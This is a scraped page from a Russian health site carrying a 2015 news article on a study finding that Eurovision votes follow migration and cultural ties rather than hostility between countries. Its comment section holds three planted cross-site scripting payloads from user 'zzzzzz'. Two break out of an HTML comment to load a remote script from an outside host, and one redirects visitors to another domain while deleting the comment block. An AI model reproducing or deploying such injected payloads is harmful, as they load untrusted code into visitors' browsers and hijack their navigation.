Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Влияет ли политика на Евр...  >>  Влияет ли политика на Евровидение?! Ученые выяснили, как раздаются голоса: читайте и делайте ставки!
 
Обратная связь
 

Влияет ли политика на Евровидение?! Ученые выяснили, как раздаются голоса: читайте и делайте ставки!

Размер шрифта
22 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Конкурс Евровидение уже давно подозревают в предвзятости, дискриминации некоторых участников и несправедливом выставлении финальных оценок. Однако подробный анализ голосований за последние 20 лет показал, что люди при голосовании скорее руководствуются симпатией к другим странам, нежели неприязнью.

Влияет ли политика на Евровидение?! Ученые выяснили, как раздаются голоса: читайте и делайте ставки!

Ученые использовали компьютерный анализ, чтобы оценить поведение различных стран при голосовании, их позитивное или же негативное отношение к участникам,  а также определить их предпочтения. Они учли такие факторы как язык исполняемой песни и пол участника, так как давно известно, что они влияют на выставление оценок. Однако ученые выделили и более существенные причины: это культурное сходство некоторых стран, а также процесс миграции людей.

«Миграция дает очень интересное объяснение полученным нами данным. Например, Германия обычно высоко оценивает участников из Турции. Возможно, это связано с тем, что многие турки эмигрировали в Германию и теперь голосуют оттуда», – рассказывает доктор Гианлука Байо, соавтор исследования. «Однако наш анализ не выявил никакого негативного отношения или дискриминации: ни у одной из стран нет «врагов», против которых голосовали бы жители».

Также ученые выяснили, что по результатам голосования можно определить четыре большие группы стран, которые обычно дают друг другу баллы: первая объединяет в себе страны бывшей Югославии, Швейцарию и Австрию, вторая – страны центральной и южной Европы, и наконец группа, которая включает в себя страны бывшего Советского Союза, Англию, Ирландию и Скандинавию – она каждый год более-менее случайным образом делится на две группы.

Так что не стоит обвинять Евровидение в дискриминации, ведь на самом деле оценки во многом обусловлены естественным процессом миграции, а также культурным сходством некоторых стран.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:07

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Московский музей «Живые системы» приглашает всех   Почему магазины могут обмануть людей, но не обезьян?   Ученые советуют материться!   Как не психовать?! Включите синий свет!  
12 июля 2013Как мы мжоем чтиать слвоа, кодга все бвукы перпуетнаы? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Суперсоки: польза для здоровья
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.